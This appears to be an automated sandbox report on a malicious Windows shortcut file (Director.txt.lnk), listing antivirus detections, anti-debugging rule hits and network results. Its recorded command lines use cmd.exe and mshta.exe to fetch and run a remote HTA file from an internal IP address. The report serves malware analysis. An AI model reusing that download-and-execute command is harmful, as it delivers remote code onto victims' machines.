Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6402 | Aug. 12, 2024, 10:42 a.m. | Aug. 12, 2024, 10:45 a.m. |
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
164.124.101.2 | Active | Moloch |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\Director.txt.lnk |
cmdline | "C:\Windows\System32\cmd.exe" /c mshta.exe http://192.168.207.2/Director.hta |
cmdline | mshta.exe http://192.168.207.2/Director.hta |
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | DebuggerException__SetConsoleCtrl | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
Lionic | Trojan.WinLNK.Nioc.4!c |
VIPRE | Heur.BZC.YAX.Nioc.1.0A7EF40E |
Sangfor | Suspicious.Win32.Save.a |
Arcabit | Heur.BZC.YAX.Nioc.1.0A2AFAB0 [many] |
Symantec | Trojan.Gen.NPE.C |
ESET-NOD32 | LNK/TrojanDownloader.Agent.AVD |
Avast | Other:Malware-gen [Trj] |
Kaspersky | HEUR:Trojan.WinLNK.Agent.gen |
BitDefender | Heur.BZC.YAX.Nioc.1.0A7EF40E |
MicroWorld-eScan | Heur.BZC.YAX.Nioc.1.0A7EF40E |
Rising | Downloader.Mshta/LNK!1.BADA (CLASSIC) |
Emsisoft | Heur.BZC.YAX.Nioc.1.0A7EF40E (B) |
FireEye | Heur.BZC.YAX.Nioc.1.0A7EF40E |
Sophos | Troj/DownLnk-X |
SentinelOne | Static AI - Suspicious LNK |
Detected | |
MAX | malware (ai score=83) |
Kingsoft | Win32.Troj.Undef.a |
Microsoft | Trojan:Script/Wacatac.B!ml |
ZoneAlarm | HEUR:Trojan.WinLNK.Agent.gen |
GData | Heur.BZC.YAX.Nioc.1.11B631AB |
VBA32 | Trojan.Link.CmdRunner |
Tencent | Win32.Trojan-Downloader.Der.Uwhl |
huorong | TrojanDownloader/LNK.Agent.cr |
AVG | Other:Malware-gen [Trj] |
dead_host | 192.168.207.2:80 |